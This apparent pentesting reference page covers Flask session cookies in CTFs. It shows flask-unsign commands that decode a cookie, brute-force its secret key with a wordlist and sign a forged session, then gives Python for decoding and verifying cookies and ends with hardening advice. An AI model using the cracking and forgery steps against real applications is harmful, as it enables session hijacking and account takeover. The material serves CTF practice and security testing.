# Flask

**In a CTF, a Flask application will most likely be related to** [**SSTI**](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection)**.**

The default session cookie name is **`session`**. Decode the cookie online [here](https://www.kirsle.net/wizards/flask-session.cgi) or manually: take the first part of the cookie, up to the first dot, and Base64-decode it (the cookie omits the `=` padding, so add it back if needed):\
`echo "ImhlbGxvIg==" | base64 -d`

The cookie is also signed using a password (the application's secret key, `SECRET_KEY`).

### Flask Unsign

Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.

<https://pypi.org/project/flask-unsign/>

```bash
## Decode
$ flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYXNkZiJ9.YosnvA.92mU6dpP4-5opRXc6h2EhLq8hVI'
{'logged_in': True, 'username': 'asdf'}

## Brute force
$ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYXNkZiJ9.YosnvA.92mU6dpP4-5opRXc6h2EhLq8hVI' --no-literal-eval
[*] Session decodes to: {'logged_in': True, 'username': 'asdf'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 17152 attempts
b'secret123'

## Sign
$ flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'
eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.Yos0Lw.Lp1b4zGs-GrDuPvgxv2kkkC3qzE
```
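The cookie layout (`payload.timestamp.signature`) and the signature check can be reproduced with the Python standard library. This is an added example, not code from the original page or from flask-unsign. It assumes Flask's default session settings (salt `cookie-session`, HMAC-SHA1 with HMAC key derivation), its function names and the key `constructed-key` are made up for illustration, and it does not check the timestamp's age.

```python
import base64, hashlib, hmac, json, zlib

SALT = b"cookie-session"  # assumption: Flask's default session salt
# Cookie taken from the flask-unsign example on this page
PAGE_COOKIE = "eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYXNkZiJ9.YosnvA.92mU6dpP4-5opRXc6h2EhLq8hVI"

def b64url_decode(text):
    # Flask strips the "=" padding, so restore it before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def decode_payload(cookie):
    """Read the session data without any key: it is signed, not encrypted."""
    compressed = cookie.startswith(".")  # a leading dot marks a zlib-compressed payload
    raw = b64url_decode(cookie.lstrip(".").split(".")[0])
    # Non-JSON types stay in Flask's tagged form; plain json is enough to inspect them
    return json.loads(zlib.decompress(raw) if compressed else raw)

def signature(secret, signed_part):
    """HMAC-SHA1 over 'payload.timestamp' with a key derived from secret and salt."""
    derived = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    mac = hmac.new(derived, signed_part.encode(), hashlib.sha1).digest()
    return base64.urlsafe_b64encode(mac).rstrip(b"=").decode()

def verify(cookie, secret):
    """True only if the last cookie segment matches the signature for this secret."""
    signed_part, _, sig = cookie.rpartition(".")
    return hmac.compare_digest(signature(secret, signed_part).encode(), sig.encode())

if __name__ == "__main__":
    print(decode_payload(PAGE_COOKIE))
    body = PAGE_COOKIE.rsplit(".", 1)[0]
    sample = body + "." + signature("constructed-key", body)  # constructed sample cookie
    print(verify(sample, "constructed-key"), verify(sample, "wrong-key"))
```

Because the payload is readable by anyone who holds the cookie, keep secrets out of the session, and set `SECRET_KEY` to a long random value so the signature cannot be guessed.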
